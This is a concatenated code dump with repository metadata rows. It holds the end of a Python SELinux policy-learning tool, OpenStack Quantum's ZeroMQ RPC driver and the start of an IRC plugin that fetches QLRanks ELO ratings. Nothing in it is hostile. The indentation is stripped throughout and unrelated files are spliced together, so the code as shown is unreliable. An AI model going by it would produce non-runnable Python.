fc_file.write("\n\n\n# **** Execve ****\n")
execve_keys = execves.keys()
for exe_path in sorted(execve_keys):
# Write all the interactions with this file
for call in execves[exe_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(exe_path), getFileCon(exe_path)))
fc_file.write("\n\n\n# **** Open ****\n")
open_keys = opens.keys()
for open_path in sorted(open_keys):
# Write all the interactions with this file
for call in opens[open_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(open_path), getFileCon(open_path)))
fc_file.write("\n\n\n# **** Standard libraries ****\n")
libs_keys = libs.keys()
for lib_path in sorted(libs_keys):
# Write all the interactions with this file
for call in libs[lib_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(lib_path), getFileCon(lib_path)))
fc_file.write("\n\n\n# **** SHM ****\n")
shms_keys = shms.keys()
for shm_path in sorted(shms_keys):
# Write all the interactions with this file
for call in shms[shm_path]:
fc_file.write("# %s\n" % call)
# Propose a rule
fc_file.write("#%s -- %s\n\n" % (escape_re(shm_path), getFileCon(shm_path)))
# Delete all the created files
deleteFileList(to_be_deleted);
def parseFCFile(policy_fc):
# Read the fc policy
if not os.path.exists(policy_fc):
return set(), "The fc policy file %s doesn't exist\n" % policy_fc
fc_policy_file = open("%s" % policy_fc, "r")
# split the fc policy file
fc_policies = []
for line in fc_policy_file:
m = re.match(r"\s*(?P<comment>#)?(?P<path>\\?/\S+)\s+(?P<type>\S+)?\s+(?P<context>\S+)", line)
if m:
pol = dict()
pol['path'] = m.groupdict()['path']
pol['type'] = m.groupdict()['type']
pol['context'] = m.groupdict()['context']
pol['commented'] = m.groupdict()['comment']=="#"
if (pol['type'] == None):
pol['type'] = ''
#print("Found rule: comment = '%s' path='%s', type='%s', context='%s'" % (pol['commented'], pol['path'], pol['type'], pol['context']))
fc_policies.append(pol)
return fc_policies
def addFCContextsToTE(policy_fc, policy_te):
# Read the te policy
if not os.path.exists(policy_te):
return set(), "The te policy file %s doesn't exist\n" % policy_fc
te_policy_file = open("%s" % policy_te, "a")
fc_policies = parseFCFile(policy_fc)
for policy in fc_policies:
if not policy['commented']:
print("got context %s\n" % policy['context'])
te_policy_file.write("type %s;\nfiles_type(%s);\n" % (policy['context'], policy['context']))
te_policy_file.close()
def editFiles(filepathes):
editor_path = os.getenv('EDITOR')
if not editor_path:
print('The $EDITOR environement variable is not set.\nWhich editor would you like to use ?')
editor = input('')
os.environ['EDITOR'] = editor
params = [editor_path]
params.extend(filepathes)
proc = subprocess.Popen(params)
proc.communicate()
return proc.returncode == 0
def willingToQuit():
print("\nThe system is currently learning a SELinux security policy.")
print("Deciding to stop it now means you have successfully tested all the functionnalities of the software you are auditing.")
print("\nAre you sure you want to stop it ? (y/N)")
answer=input('')
if answer in ('y', 'Y', 'Yes', 'yes'):
return True
else:
return False
def startAuditing(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse):
# Re-route signals to the launched process
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGTERM, handler)
signal.signal(signal.SIGHUP, handler)
global wantToAbort
wantToAbort = False
if not reuse:
# Get a base policy and load it
print("Generate the base policy and load it")
base_policy=generateBasePolicy(module_name, app_path, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc)
if not compileAndLoadSELinuxModule(base_policy):
return False
else:
if not os.path.exists(getPolicyPath(module_name, "te")):
print("The module %s doesn't exist." % module_name)
return
# Create a policy for selpolgen.py so as when it launches the audited program, the audited program will transit to the right domain
print("Generate the sysadm policy to launch the application in the right context")
temp_policy=generateAuditPolicy(module_name, app_path, module_domain_t, module_exec_t, user_u, user_r, user_t)
if not compileAndLoadSELinuxModule(temp_policy):
return False
# Set the app context on the disc
print("Set the application file's new context")
setFileSELinuxContext("system_u", "object_r", module_exec_t, app_path)
# run the application
askToRunApp(app_path, user_t, audit_fc);
if audit_fc:
isRunning = True
while isRunning :
if wantToAbort:
if willingToQuit():
sys.exit(0)
else:
wantToAbort = False
time.sleep(0.1)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
isRunning = False
# Propose some file constraints
print("Update the fc file, this may take a while");
auditStraceLogs(module_name)
# Regenerate the policy
updateAndReloadRules(module_name, module_domain_t, enforcingMode = True, forceReload=True)
# let the application start again
os.remove("/tmp/selinux-audit/lock")
print("FC Labelling done\n")
print("Start the TE learning loop")
# learning loop
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
zeroRuleLoopCount = 0
while True:
if wantToAbort:
if willingToQuit():
break
else:
wantToAbort = False
time.sleep(0.1)
nbRulesAddedSinceLastExecution += updateAndReloadRules(module_name, module_domain_t)
# remove the lock if the file exists
if os.path.exists("/tmp/selinux-audit/lock"):
if nbRulesAddedSinceLastExecution > 0:
auditStraceLogs(module_name, dir_path="/tmp/selinux-audit/", saveResults=False)
zeroRuleLoopCount = 0
elif time.time()-execStart > 2.0 or zeroRuleLoopCount > 5:
print("\n**********\nNo rules have been added during the execution of this audit instance.")
print("Have you tested every use case allowed for the application ? (y/N)")
answer=input('')
print("**********")
if answer in ('y', 'Y', 'Yes', 'yes'):
break
zeroRuleLoopCount = 0
else:
zeroRuleLoopCount = zeroRuleLoopCount + 1
print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount)
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
os.remove("/tmp/selinux-audit/lock");
print("\nThe final policy can be found at %s" % getPolicyPath(module_name, ""))
class Usage(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def show_help():
print("Help:\n")
print("-h or --help : This help message")
print("-m or --module : The name of the SELinux module you would like to create (mandatory)")
print("-u or --user_u : The SELinux user who will execute the application")
print("-r or --user_r : The SELinux role who will execute the application")
print("-t or --user_t : The SELinux type who will execute the application")
print("-d or --module_domain_t : The domain in which the audited application will be executed")
print("-e or --module_exec_t : The file label that will be given to the application")
print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files")
print("-l or --module_log_domain_t : The file label that will be given to the application's log files")
print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less")
print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new")
def main(argv=None):
if argv is None:
argv = sys.argv
cwd = os.path.dirname(os.path.realpath(argv[0])) + '/'
os.chdir(cwd)
try:
# Check the given parameter names and get their values
try:
opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp",
["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"])
except(getopt.error) as msg:
print("Argument parsing error: %s" % msg)
raise Usage(msg)
# Params
module_name = ''
module_domain_t = ''
module_exec_t = ''
module_tmp_domain_t = ''
module_log_domain_t = ''
audit_fc = True
app_fullpath = ''
user_u = user_u_default
user_r = user_r_default
user_t = user_t_default
reuse = False
# Get the parameters
for opt, arg in opts:
if opt in ("-h", "--help"):
show_help()
return 0
elif opt in ("-v", "--verbose"):
verbosity += 1
elif opt in ("-m", "--module"):
module_name = arg
elif opt in ("-u", "--user_u"):
user_u = arg
elif opt in ("-r", "--user_r"):
user_r = arg
elif opt in ("-t", "--user_t"):
user_t = arg
elif opt in ("-e", "--module_exec_t"):
module_exec_t = arg
elif opt in ("-d", "--module_domain_t"):
module_domain_t = arg
elif opt in ("-t", "--module_tmp_domain_t"):
module_tmp_domain_t = arg
elif opt in ("-l", "--module_log_domain_t"):
module_log_domain_t = arg
elif opt in ("-f", "--no_fc_pass"):
audit_fc = False
elif opt in ("-p", "--reuse_policy"):
reuse = True
# if there are no args left, then an error happened
if len(args) == 0 or module_name == '':
print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr)
else:
# Get the fullpath
app_fullpath = args[len(args)-1]
# Set the default value for module_domain_t & module_exec_t if there were not set by the user
if module_domain_t == '':
module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name)
if module_exec_t == '':
module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name)
if module_tmp_domain_t == '':
module_tmp_domain_t = module_tmp_domain_t_default_pattern.replace("%modulename%", module_name)
if module_log_domain_t == '':
module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name)
# Let's recap to the user what he has chosen.
print('You are about to create a SELinux module for the application')
print('')
print('Here is the summary of how it will be created:')
print(' Module name (-m): %s' % module_name)
print(' Application path: \'%s\'' % app_fullpath)
print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t))
print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t))
print(' Jailed in the domain (-d): %s' % module_domain_t)
print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t)
print(' Log file\'s domain is (-l): %s' % module_log_domain_t)
print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc))
print(' Re-use an existing policy (-p): %s' % (reuse))
print('')
print('Do you agree with that ? (Y/n)')
answer=input('')
if answer in ('', 'y', 'Y', 'Yes', 'yes'):
startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse)
else:
return 0
except(Usage) as err:
print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr)
print('For a list of available options, use "%s --help"'\
% sys.argv[0], file=sys.stderr)
return -1
if __name__ == '__main__':
main()
| gpl-3.0 | -7,108,910,309,036,765,000 | 32.52431 | 267 | 0.65428 | false |
rossella/neutron | quantum/openstack/common/rpc/impl_zmq.py | 1 | 25519 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import socket
import string
import sys
import types
import uuid
import eventlet
import greenlet
from quantum.openstack.common import cfg
from quantum.openstack.common.gettextutils import _
from quantum.openstack.common import importutils
from quantum.openstack.common import jsonutils
from quantum.openstack.common import processutils as utils
from quantum.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# for convenience, are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('quantum.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
def _serialize(data):
"""
Serialization wrapper
We prefer using JSON, but it cannot encode all types.
Error if a developer passes us bad data.
"""
try:
return str(jsonutils.dumps(data, ensure_ascii=True))
except TypeError:
LOG.error(_("JSON serialization failed."))
raise
def _deserialize(data):
"""
Deserialization wrapper
"""
LOG.debug(_("Deserializing: %s"), data)
return jsonutils.loads(data)
class ZmqSocket(object):
"""
A tiny wrapper around ZeroMQ to simplify the send/recv protocol
and connection management.
Can be used as a Context (supports the 'with' statement).
"""
def __init__(self, addr, zmq_type, bind=True, subscribe=None):
self.sock = _get_ctxt().socket(zmq_type)
self.addr = addr
self.type = zmq_type
self.subscriptions = []
# Support failures on sending/receiving on wrong socket type.
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
self.can_sub = zmq_type in (zmq.SUB, )
# Support list, str, & None for subscribe arg (cast to list)
do_sub = {
list: subscribe,
str: [subscribe],
type(None): []
}[type(subscribe)]
for f in do_sub:
self.subscribe(f)
str_data = {'addr': addr, 'type': self.socket_s(),
'subscribe': subscribe, 'bind': bind}
LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
LOG.debug(_("-> bind: %(bind)s"), str_data)
try:
if bind:
self.sock.bind(addr)
else:
self.sock.connect(addr)
except Exception:
raise RPCException(_("Could not open socket."))
def socket_s(self):
"""Get socket type as string."""
t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
'DEALER')
return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]
def subscribe(self, msg_filter):
"""Subscribe."""
if not self.can_sub:
raise RPCException("Cannot subscribe on this socket.")
LOG.debug(_("Subscribing to %s"), msg_filter)
try:
self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
except Exception:
return
self.subscriptions.append(msg_filter)
def unsubscribe(self, msg_filter):
"""Unsubscribe."""
if msg_filter not in self.subscriptions:
return
self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
self.subscriptions.remove(msg_filter)
def close(self):
if self.sock is None or self.sock.closed:
return
# We must unsubscribe, or we'll leak descriptors.
if len(self.subscriptions) > 0:
for f in self.subscriptions:
try:
self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
except Exception:
pass
self.subscriptions = []
try:
# Default is to linger
self.sock.close()
except Exception:
# While this is a bad thing to happen,
# it would be much worse if some of the code calling this
# were to fail. For now, lets log, and later evaluate
# if we can safely raise here.
LOG.error("ZeroMQ socket could not be closed.")
self.sock = None
def recv(self):
if not self.can_recv:
raise RPCException(_("You cannot recv on this socket."))
return self.sock.recv_multipart()
def send(self, data):
if not self.can_send:
raise RPCException(_("You cannot send on this socket."))
self.sock.send_multipart(data)
class ZmqClient(object):
"""Client for ZMQ sockets."""
def __init__(self, addr, socket_type=None, bind=False):
if socket_type is None:
socket_type = zmq.PUSH
self.outq = ZmqSocket(addr, socket_type, bind=bind)
def cast(self, msg_id, topic, data, serialize=True, force_envelope=False):
if serialize:
data = rpc_common.serialize_msg(data, force_envelope)
self.outq.send([str(msg_id), str(topic), str('cast'),
_serialize(data)])
def close(self):
self.outq.close()
class RpcContext(rpc_common.CommonRpcContext):
"""Context that supports replying to a rpc.call."""
def __init__(self, **kwargs):
self.replies = []
super(RpcContext, self).__init__(**kwargs)
def deepcopy(self):
values = self.to_dict()
values['replies'] = self.replies
return self.__class__(**values)
def reply(self, reply=None, failure=None, ending=False):
if ending:
return
self.replies.append(reply)
@classmethod
def marshal(self, ctx):
ctx_data = ctx.to_dict()
return _serialize(ctx_data)
@classmethod
def unmarshal(self, data):
return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
"""Used by ConsumerBase as a private context for - methods."""
def __init__(self, proxy):
self.proxy = proxy
self.msg_waiter = None
def _get_response(self, ctx, proxy, topic, data):
"""Process a curried message and cast the result to topic."""
LOG.debug(_("Running func with context: %s"), ctx.to_dict())
data.setdefault('version', None)
data.setdefault('args', {})
try:
result = proxy.dispatch(
ctx, data['version'], data['method'], **data['args'])
return ConsumerBase.normalize_reply(result, ctx.replies)
except greenlet.GreenletExit:
# ignore these since they are just from shutdowns
pass
except rpc_common.ClientException, e:
LOG.debug(_("Expected exception during message handling (%s)") %
e._exc_info[1])
return {'exc':
rpc_common.serialize_remote_exception(e._exc_info,
log_failure=False)}
except Exception:
LOG.error(_("Exception during message handling"))
return {'exc':
rpc_common.serialize_remote_exception(sys.exc_info())}
def reply(self, ctx, proxy,
msg_id=None, context=None, topic=None, msg=None):
"""Reply to a casted call."""
# Our real method is curried into msg['args']
child_ctx = RpcContext.unmarshal(msg[0])
response = ConsumerBase.normalize_reply(
self._get_response(child_ctx, proxy, topic, msg[1]),
ctx.replies)
LOG.debug(_("Sending reply"))
cast(CONF, ctx, topic, {
'method': '-process_reply',
'args': {
'msg_id': msg_id,
'response': response
}
})
class ConsumerBase(object):
"""Base Consumer."""
def __init__(self):
self.private_ctx = InternalContext(None)
@classmethod
def normalize_reply(self, result, replies):
#TODO(ewindisch): re-evaluate and document this method.
if isinstance(result, types.GeneratorType):
return list(result)
elif replies:
return replies
else:
return [result]
def process(self, style, target, proxy, ctx, data):
# Method starting with - are
# processed internally. (non-valid method name)
method = data['method']
# Internal method
# uses internal context for safety.
if data['method'][0] == '-':
# For reply / process_reply
method = method[1:]
if method == 'reply':
self.private_ctx.reply(ctx, proxy, **data['args'])
return
data.setdefault('version', None)
data.setdefault('args', {})
proxy.dispatch(ctx, data['version'],
data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
"""
A consumer class implementing a
centralized casting broker (PULL-PUSH)
for RoundRobin requests.
"""
def __init__(self, conf):
super(ZmqBaseReactor, self).__init__()
self.mapping = {}
self.proxies = {}
self.threads = []
self.sockets = []
self.subscribe = {}
self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)
def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
zmq_type_out=None, in_bind=True, out_bind=True,
subscribe=None):
LOG.info(_("Registering reactor"))
if zmq_type_in not in (zmq.PULL, zmq.SUB):
raise RPCException("Bad input socktype")
# Items push in.
inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
subscribe=subscribe)
self.proxies[inq] = proxy
self.sockets.append(inq)
LOG.info(_("In reactor registered"))
if not out_addr:
return
if zmq_type_out not in (zmq.PUSH, zmq.PUB):
raise RPCException("Bad output socktype")
# Items push out.
outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)
self.mapping[inq] = outq
self.mapping[outq] = inq
self.sockets.append(outq)
LOG.info(_("Out reactor registered"))
def consume_in_thread(self):
def _consume(sock):
LOG.info(_("Consuming socket"))
while True:
self.consume(sock)
for k in self.proxies.keys():
self.threads.append(
self.pool.spawn(_consume, k)
)
def wait(self):
for t in self.threads:
t.wait()
def close(self):
for s in self.sockets:
s.close()
for t in self.threads:
t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
def __init__(self, conf):
super(ZmqProxy, self).__init__(conf)
self.topic_proxy = {}
def consume(self, sock):
ipc_dir = CONF.rpc_zmq_ipc_dir
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
msg_id, topic, style, in_msg = data
topic = topic.split('.', 1)[0]
LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))
# Handle zmq_replies magic
if topic.startswith('fanout~'):
sock_type = zmq.PUB
elif topic.startswith('zmq_replies'):
sock_type = zmq.PUB
inside = rpc_common.deserialize_msg(_deserialize(in_msg))
msg_id = inside[-1]['args']['msg_id']
response = inside[-1]['args']['response']
LOG.debug(_("->response->%s"), response)
data = [str(msg_id), _serialize(response)]
else:
sock_type = zmq.PUSH
if not topic in self.topic_proxy:
def publisher(waiter):
LOG.info(_("Creating proxy for topic: %s"), topic)
try:
out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
(ipc_dir, topic),
sock_type, bind=True)
except RPCException:
waiter.send_exception(*sys.exc_info())
return
self.topic_proxy[topic] = eventlet.queue.LightQueue(
CONF.rpc_zmq_topic_backlog)
self.sockets.append(out_sock)
# It takes some time for a pub socket to open,
# before we can have any faith in doing a send() to it.
if sock_type == zmq.PUB:
eventlet.sleep(.5)
waiter.send(True)
while(True):
data = self.topic_proxy[topic].get()
out_sock.send(data)
LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
{'data': data})
wait_sock_creation = eventlet.event.Event()
eventlet.spawn(publisher, wait_sock_creation)
try:
wait_sock_creation.wait()
except RPCException:
LOG.error(_("Topic socket file creation failed."))
return
try:
self.topic_proxy[topic].put_nowait(data)
LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
{'data': data})
except eventlet.queue.Full:
LOG.error(_("Local per-topic backlog buffer full for topic "
"%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
raise
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
raise
super(ZmqProxy, self).consume_in_thread()
class ZmqReactor(ZmqBaseReactor):
"""
A consumer class implementing a
consumer for messages. Can also be
used as a 1:1 proxy
"""
def __init__(self, conf):
super(ZmqReactor, self).__init__(conf)
def consume(self, sock):
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
if sock in self.mapping:
LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
'data': data})
self.mapping[sock].send(data)
return
msg_id, topic, style, in_msg = data
ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg))
ctx = RpcContext.unmarshal(ctx)
proxy = self.proxies[sock]
self.pool.spawn_n(self.process, style, topic,
proxy, ctx, request)
class Connection(rpc_common.Connection):
"""Manages connections and threads."""
def __init__(self, conf):
self.reactor = ZmqReactor(conf)
def create_consumer(self, topic, proxy, fanout=False):
# Only consume on the base topic name.
topic = topic.split('.', 1)[0]
LOG.info(_("Create Consumer for topic (%(topic)s)") %
{'topic': topic})
# Subscription scenarios
if fanout:
subscribe = ('', fanout)[type(fanout) == str]
sock_type = zmq.SUB
topic = 'fanout~' + topic
else:
sock_type = zmq.PULL
subscribe = None
# Receive messages from (local) proxy
inaddr = "ipc://%s/zmq_topic_%s" % \
(CONF.rpc_zmq_ipc_dir, topic)
LOG.debug(_("Consumer is a zmq.%s"),
['PULL', 'SUB'][sock_type == zmq.SUB])
self.reactor.register(proxy, inaddr, sock_type,
subscribe=subscribe, in_bind=False)
def close(self):
self.reactor.close()
def wait(self):
self.reactor.wait()
def consume_in_thread(self):
self.reactor.consume_in_thread()
def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True,
force_envelope=False):
timeout_cast = timeout or CONF.rpc_cast_timeout
payload = [RpcContext.marshal(context), msg]
with Timeout(timeout_cast, exception=rpc_common.Timeout):
try:
conn = ZmqClient(addr)
# assumes cast can't return an exception
conn.cast(msg_id, topic, payload, serialize, force_envelope)
except zmq.ZMQError:
raise RPCException("Cast failed. ZMQ Socket Exception")
finally:
if 'conn' in vars():
conn.close()
def _call(addr, context, msg_id, topic, msg, timeout=None,
serialize=True, force_envelope=False):
# timeout_response is how long we wait for a response
timeout = timeout or CONF.rpc_response_timeout
# The msg_id is used to track replies.
msg_id = uuid.uuid4().hex
# Replies always come into the reply service.
reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
LOG.debug(_("Creating payload"))
# Curry the original request into a reply method.
mcontext = RpcContext.marshal(context)
payload = {
'method': '-reply',
'args': {
'msg_id': msg_id,
'context': mcontext,
'topic': reply_topic,
'msg': [mcontext, msg]
}
}
LOG.debug(_("Creating queue socket for reply waiter"))
# Messages arriving async.
# TODO(ewindisch): have reply consumer with dynamic subscription mgmt
with Timeout(timeout, exception=rpc_common.Timeout):
try:
msg_waiter = ZmqSocket(
"ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir,
zmq.SUB, subscribe=msg_id, bind=False
)
LOG.debug(_("Sending cast"))
_cast(addr, context, msg_id, topic, payload,
serialize=serialize, force_envelope=force_envelope)
LOG.debug(_("Cast sent; Waiting reply"))
# Blocks until receives reply
msg = msg_waiter.recv()
LOG.debug(_("Received message: %s"), msg)
LOG.debug(_("Unpacking response"))
responses = _deserialize(msg[-1])
# ZMQError trumps the Timeout error.
except zmq.ZMQError:
raise RPCException("ZMQ Socket Error")
finally:
if 'msg_waiter' in vars():
msg_waiter.close()
# It seems we don't need to do all of the following,
# but perhaps it would be useful for multicall?
# One effect of this is that we're checking all
# responses for Exceptions.
for resp in responses:
if isinstance(resp, types.DictType) and 'exc' in resp:
raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None, serialize=True,
force_envelope=False):
"""
Wraps the sending of messages,
dispatches to the matchmaker and sends
message to all relevant hosts.
"""
conf = CONF
LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
queues = _get_matchmaker().queues(topic)
LOG.debug(_("Sending message(s) to: %s"), queues)
# Don't stack if we have no matchmaker results
if len(queues) == 0:
LOG.warn(_("No matchmaker results. Not casting."))
# While not strictly a timeout, callers know how to handle
# this exception and a timeout isn't too big a lie.
raise rpc_common.Timeout, "No match from matchmaker."
# This supports brokerless fanout (addresses > 1)
for queue in queues:
(_topic, ip_addr) = queue
_addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
if method.__name__ == '_cast':
eventlet.spawn_n(method, _addr, context,
_topic, _topic, msg, timeout, serialize,
force_envelope)
return
return method(_addr, context, _topic, _topic, msg, timeout,
serialize, force_envelope)
def create_connection(conf, new=True):
return Connection(conf)
def multicall(conf, *args, **kwargs):
"""Multiple calls."""
return _multi_send(_call, *args, **kwargs)
def call(conf, *args, **kwargs):
"""Send a message, expect a response."""
data = _multi_send(_call, *args, **kwargs)
return data[-1]
def cast(conf, *args, **kwargs):
"""Send a message expecting no reply."""
_multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
"""Send a message to all listening and expect no reply."""
# NOTE(ewindisch): fanout~ is used because it avoid splitting on .
# and acts as a non-subtle hint to the matchmaker and ZmqProxy.
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs)
def notify(conf, context, topic, msg, **kwargs):
"""
Send notification event.
Notifications are sent to topic-priority.
This differs from the AMQP drivers which send to topic.priority.
"""
# NOTE(ewindisch): dot-priority in rpc notifier does not
# work with our assumptions.
topic.replace('.', '-')
kwargs['serialize'] = kwargs.pop('envelope')
kwargs['force_envelope'] = True
cast(conf, context, topic, msg, **kwargs)
def cleanup():
"""Clean up resources in use by implementation."""
global ZMQ_CTX
if ZMQ_CTX:
ZMQ_CTX.term()
ZMQ_CTX = None
global matchmaker
matchmaker = None
def _get_ctxt():
if not zmq:
raise ImportError("Failed to import eventlet.green.zmq")
global ZMQ_CTX
if not ZMQ_CTX:
ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
return ZMQ_CTX
def _get_matchmaker():
global matchmaker
if not matchmaker:
# rpc_zmq_matchmaker should be set to a 'module.Class'
mm_path = CONF.rpc_zmq_matchmaker.split('.')
mm_module = '.'.join(mm_path[:-1])
mm_class = mm_path[-1]
# Only initialize a class.
if mm_path[-1][0] not in string.ascii_uppercase:
LOG.error(_("Matchmaker could not be loaded.\n"
"rpc_zmq_matchmaker is not a class."))
raise RPCException(_("Error loading Matchmaker."))
mm_impl = importutils.import_module(mm_module)
mm_constructor = getattr(mm_impl, mm_class)
matchmaker = mm_constructor()
return matchmaker
| apache-2.0 | -8,324,594,890,385,945,000 | 31.018821 | 78 | 0.568361 | false |
anlutro/botologist | plugins/qlranks.py | 1 | 2116 | import logging
log = logging.getLogger(__name__)
import requests
import requests.exceptions
import botologist.plugin
def _get_qlr_data(nick):
url = "http://www.qlranks.com/api.aspx"
response = requests.get(url, {"nick": nick}, timeout=4)
return response.json()["players"][0]
def _get_qlr_elo(nick, modes=None):
"""
Get someone's QLRanks ELO.
nick should be a valid Quake Live nickname. modes should be an iterable
(list, tuple) of game-modes to display ELO for (duel, ctf, tdm...)
"""
if modes is None:
modes = ("duel",)
try:
data = _get_qlr_data(nick)
except requests.exceptions.RequestException:
log.warning("QLRanks request caused an exception", exc_info=True)
return "HTTP error, try again!"
# qlranks returns rank 0 indicating a player has no rating - if all modes
# have rank 0, it is safe to assume the player does not exist
unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)]
if all(unranked):
return "Player not found or no games played: " + data.get("nick", "unknown")
retval = data["nick"]
# convert to set to prevent duplicates
for mode in set(modes):
if mode not in data:
return "Unknown mode: " + mode
if data[mode]["rank"] == 0:
retval += " - {mode}: unranked".format(mode=mode)
else:
retval += " - {mode}: {elo} (rank {rank:,})".format(
mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"]
)
return retval
class QlranksPlugin(botologist.plugin.Plugin):
"""QLRanks plugin."""
